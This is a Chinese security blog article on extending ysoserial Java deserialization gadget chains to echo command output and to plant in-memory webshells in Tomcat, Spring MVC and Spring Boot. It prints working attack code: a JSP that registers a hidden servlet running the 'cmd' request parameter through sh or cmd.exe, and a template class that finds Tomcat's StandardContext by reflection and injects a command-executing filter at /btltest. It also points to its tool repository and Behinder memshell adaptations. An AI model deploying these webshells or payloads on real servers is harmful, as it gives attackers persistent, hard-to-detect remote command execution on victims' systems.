基于ysoserial的深度利用研究(命令回显与内存马) - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

基于ysoserial的深度利用研究(命令回显与内存马)

盛邦安全 技术 2023-03-24 11:44:21
101172
收藏

导语:命令回显与内存马研究

0x01 前言

很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。(关注“Beacon Tower Lab”烽火台实验室,为您持续输出前沿的安全攻防技术)

在上一篇文章中↓↓↓

记一次反序列化漏洞的利用之路

遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。

0x02 回显

在研究基于反序列化利用链的回显实现之前,首先解决基于反序列化利用链的回显实现,也就是在响应结果中输出命令执行的结果。对PHP语言熟悉的小伙伴可能会觉得这并不算问题,直接echo不就行了,java里面是不是也应该有类似的函数例如out.println()。Java是一种面向对象的编程语言,所有的操作都是基于类和对象进行,如果要在页面响应中输出内容,必须要先有HttpServletResponse对象,典型的把命令执行结果响应到页面的方式如图2.1所示。

1679537651111929.png

图2.1 通过HttpServletResponse对象输出命令执行结果

从图2.1可以看出最简单的命令执行,也需要比较复杂的代码逻辑,也就要求利用链中必须要支持执行复杂语句。并不是所有的ysoserial利用链都能达到回显和

内存马的效果,只有支持复杂语句的利用链才能回显和内存马,如表2.1所示。

表2.1 ysoserial利用链中对复杂语句的支持

1679537698187977.jpeg

我们先以CommonsBeanutils1利用链来进行分析,其他CommonsCollections利用链本质上是一样的,CommonsBeanutils1链和CommonsCollections链最终都是xalan库来动态加载字节码,执行复杂语句。关于xalan利用链的分析网上有很多文章,这里暂不做分析。

要实现反序列化利用链的结果回显,最重要的是要获取到HttpServletRequest对象和HttpServletResponse对象,根据目标环境的不同,获取这两个对象的办法是不一样的,如图2.2,图2.3所示。

1679537754866091.png

图2.2 SpringBoot环境下获取request和response对象

1679537779179682.png

图2.3 SpringMVC环境下获取request和response对象

不同的服务器获取这两个对象的方式不一样,其他例如Weblogic、Jboss、Websphere这些中间件获取这两个对象的方式也不一样,这种差异化极大的增加了反序列化回显和内存马实现的难度。

有没有一种比较通用的办法能够获取到request和response对象呢?答案是有的,基于Thread.CurrentThread()递归搜索可以实现通用的对象查找。目前测试环境是SpringMVC和SpringBOOT,其他环境暂未测试。

Thread.CurrentThread()中保存了当前线程中的全局信息,系统运行环境中所有的类对象都保存在Thread.CurrentThread()。用于回显需要的request和response对象可以在Thread.CurrentThread()中找到;用于内存马实现的StandardContext对象也可以找到。

递归搜索的思路就是遍历Thread.CurrentThread()下的每一个字段,如果字段类别继承自目标类(例如javax.servlet.http.HttpServletRequest),则进行标记,否则继续遍历。如图2.3的方式是在已知目标类的位置获取目标类对应对象的方式,我们的改进办法是在未知目标类位置的情况下,通过遍历的方式来发现目标类对象。

其中关键的代码如图2.4所示,完整的代码见github项目地址。其中最关键的步骤是通过递归的方式来查找Thread.CurrentThread()的所有字段,依次判断字段类型是否为javax.servlet.http.HttpServletRequest和javax.servlet.http.HttpServletResponse。

1679537821729281.png

图2.4 通过递归方式来查找request和response对象

使用这种方式的好处是通用性高,而不需要再去记不同服务器下对象的具体位置。把这种方式保存为一条新的利用链CommonsBeanutils1Echo,然后就可以在兼容SpringMVC和SpringBoot的环境中使用相同的反序列化包,如图2.5,图2.6所示。

1679537849174356.png

图2.5 生成payload

1679537888768042.png

图2.6 使用生成的payload进行反序列化测试

0x03 内存马

内存马一直都是java反序列化利用的终极目标,内存马的实现方式有很多种,其中最常见的是基于Filter的内存马,本文目标也是通过反序列化漏洞实现通用的冰蝎内存马。

基于Filter型的内存马实现步骤比较固定,如果是在jsp的环境下,可以使用下面的方式来生成内存马。

<%@ page import="java.io.IOException" %><%@ page import="java.io.InputStream" %><%@ page import="java.util.Scanner" %><%@ page import="org.apache.catalina.core.StandardContext" %><%@ page import="java.io.PrintWriter" %>
<%    // 创建恶意Servlet    Servlet servlet = new Servlet() {        @Override        public void init(ServletConfig servletConfig) throws ServletException {
       }        @Override        public ServletConfig getServletConfig() {            return null;        }        @Override        public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {            String cmd = servletRequest.getParameter("cmd");            boolean isLinux = true;            String osTyp = System.getProperty("os.name");            if (osTyp != null && osTyp.toLowerCase().contains("win")) {                isLinux = false;            }            String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();            Scanner s = new Scanner(in).useDelimiter("\\a");            String output = s.hasNext() ? s.next() : "";            PrintWriter out = servletResponse.getWriter();            out.println(output);            out.flush();            out.close();        }        @Override        public String getServletInfo() {            return null;        }        @Override        public void destroy() {
       }    };
%><%    // 获取StandardContext    org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();    StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();
   // 用Wrapper对其进行封装    org.apache.catalina.Wrapper newWrapper = standardCtx.createWrapper();    newWrapper.setName("pv587");    newWrapper.setLoadOnStartup(1);    newWrapper.setServlet(servlet);    newWrapper.setServletClass(servlet.getClass().getName());
   // 添加封装后的恶意Wrapper到StandardContext的children当中    standardCtx.addChild(newWrapper);
   // 添加ServletMapping将访问的URL和Servlet进行绑定    standardCtx.addServletMapping("/pv587","pv587");%>

访问上面的jsp文件,然后就可以删除文件,访问内存马了,如图3.1所示。

1679538018616480.png

图3.1 通过jsp文件来实现内存马

上面的代码是最初级的内存马实现,通过jsp文件来实现的命令执行的内存马。由于本文的重点不是讲内存马的原理,所以代码原理简单在注释中说明,如果需要详细的原因可以参考其他专门讲内存马的文章。在反序列化环境下实现冰蝎的内存马要比这个复杂很多,但是其中一些本质上的步骤是不变的。

内存马实现种最关键的是要获取StandardContext对象,然后基于这个对象来绑定Wrapper。不同的环境下获取StandardContext对象的方式不一样,与上面步骤回显的方式一致,也可以通过递归搜索的方式从Thread.CurrentThread()中查找,把上面内存马的实现放在递归搜索的模版中实现如下所示。

package ysoserial.template;

import org.apache.catalina.Context;import org.apache.catalina.core.ApplicationFilterConfig;import org.apache.catalina.core.StandardContext;import org.apache.catalina.deploy.FilterDef;import org.apache.catalina.deploy.FilterMap;
import javax.servlet.*;import java.io.IOException;import java.io.InputStream;import java.io.PrintWriter;import java.lang.reflect.Constructor;import java.util.HashSet;import java.lang.reflect.Array;import java.lang.reflect.Field;import java.util.*;
public class DFSMemShell {
   private HashSet set = new HashSet();    private Object standard_context_obj;    private Class standard_context_clazz = Class.forName("org.apache.catalina.core.StandardContext");
   public DFSMemShell() throws Exception {        StandardContext standardCtx = (StandardContext) standard_context_obj;        FilterDef filterDef = new FilterDef();        filterDef.setFilterName("TestFilter");        filterDef.setFilter(new Filter() {            @Override            public void init(FilterConfig filterConfig) throws ServletException {
           }
           @Override            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {                String cmd = servletRequest.getParameter("cmd");                boolean isLinux = true;                String osTyp = System.getProperty("os.name");                if (osTyp != null && osTyp.toLowerCase().contains("win")) {                    isLinux = false;                }                String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();                Scanner s = new Scanner(in).useDelimiter("\\a");                String output = s.hasNext() ? s.next() : "";                PrintWriter out = servletResponse.getWriter();                out.println(output);                out.flush();                out.close();
           }
           @Override            public void destroy() {
           }        });        standardCtx.addFilterDef(filterDef);
       Constructor constructor =  ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, filterDef.getClass());        constructor.setAccessible(true);        ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig)constructor.newInstance(standardCtx, filterDef);        Field field = standardCtx.getClass().getDeclaredField("filterConfigs");        field.setAccessible(true);        Map applicationFilterConfigs = (Map) field.get(standardCtx);        applicationFilterConfigs.put("TestFilter", applicationFilterConfig);        FilterMap filterMap = new FilterMap();        filterMap.setFilterName("TestFilter");        filterMap.addURLPattern("/btltest");        //动态应用FilterMap        standardCtx.addFilterMap(filterMap);    }

   public Object getStandardContext(){        return standard_context_obj;    }
   public void search(Object obj) throws IllegalAccessException {        if (obj == null){            return;        }        if (standard_context_obj != null){            return;        }        if (obj.getClass().equals(Object.class) ) {            return;        }        if (standard_context_clazz.isAssignableFrom(obj.getClass())){            System.out.println("Found standardContext");            standard_context_obj = obj;            return;        }        if (obj.getClass().isArray()) {            for (int i = 0; i < Array.getLength(obj); i++) {                search(Array.get(obj, i));            }        } else {            Queue q = getAllFields(obj);            while (!q.isEmpty()) {                Field field = (Field) q.poll();                field.setAccessible(true);                Object fieldValue = field.get(obj);                if(standard_context_clazz.isAssignableFrom(fieldValue.getClass())){                    System.out.println("Found standard context1");                    standard_context_obj = fieldValue;                }                else{                    search(fieldValue);                }
           }        }    }
   public Queue getAllFields(Object obj) throws IllegalAccessException {        Queue queue = new LinkedList();        for (Class clazz = obj.getClass(); clazz != null; clazz = clazz.getSuperclass()) {            Field[] fields = clazz.getDeclaredFields();            for (Field f : fields) {                if (f.getType().isPrimitive()) {                    continue;                } else if (f.getType().isArray() && f.getType().getComponentType().isPrimitive()) {                    continue;                }  else {                    f.setAccessible(true);                    Object fieldValue = f.get(obj);                    if (fieldValue != null) {                        int hashcode = fieldValue.hashCode();                        if (set.contains(hashcode)) {                        } else {                            set.add(hashcode);                            queue.offer(f);                        }                    }                }            }        }        return queue;    }
}

以上面的类为模版,通过xalan链动态字节码加载的方式来生成对应的类对象,会自动这个类中的构造函数,本来逻辑上是没有问题的。但是在实际测试过程中却一直不能成功,后来找到了问题的根源,通过xalan来加载类对应的字节码文件是单个文件,如果类中有内部类或者匿名内部类,则会加载失败。

通过把动态生成的字节码保存到任意class文件,查看文件内容如图3.2所示。从图中可以看出原本定义的Filter类型的匿名内部类变成了”new 1(this)”。

1679538086970699.png

图3.2 动态生成的字节码文件中没有匿名内部类的内容

本来不知道怎么办,但是转念一想,通过反序列化来实现内存马早已经有大佬实现,肯定是有办法解决这个问题的。在项目https://github.com/WhiteHSBG/JNDIExploit中提供了多种环境下实现内存马的方式,如图3.3所示。

1679538120187613.png

图3.3 通过反射的方式来动态加载字节码

如图3.3所示,通过反射的方式来生成Filter类型的对象,避免了使用内部类和匿名内部类,这确实是一个高明的技巧。既然有前辈的足迹,我们直接就可以占在巨人的肩膀上,把JNDIExploit中关于内存马实现的部分拷贝到我这里的反序列化模板中。注意,这里在实现冰蝎内存马的时候同样存在内部类问题,冰蝎中的内部类也需要通过反射的方式来实现。

在实际使用中,还有两个问题需要修改,其中第一个是动态加载字节码运行其中的equals方法,调用方式有问题,如图3.4,图3.5所示。

1679538149139221.png图3.4 JNDIExploit中加载调用equals方法

1679538175165680.png图3.5 修改后加载调用equals方法

另一个问题是对于SpringBoot interceptor拦截器内存马,在响应的时候必须明确指定状态码为200,不然冰蝎的客户端会连不上,如图3.6所示。

1679538338134440.png

图3.6 设置状态码为200

这样之后就可以通过反序列化xalan执行复杂语句生成内存马,详细的代码参考https://github.com/webraybtl/ysoserialbtl,如图3.7所示。

1679538225182597.png

0x04 结论

内存马的实现其实是挺复杂的过程,不同环境下实现方式并不完全一样,通过递归搜索的方式可以简化我们寻找特定对象的方式,并具有更高的兼容性。

完整代码已经放在↓↓↓

https://github.com/webraybtl/ysoserialbtl

CC链不支持复杂语句,并不是一定的,在某些情况下也可以让其支持,比如通过ScriptEngineManager加载js解析引擎来执行复杂语句。这会是一种更通用的实现内存马的方式吗?还有待研究。


如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务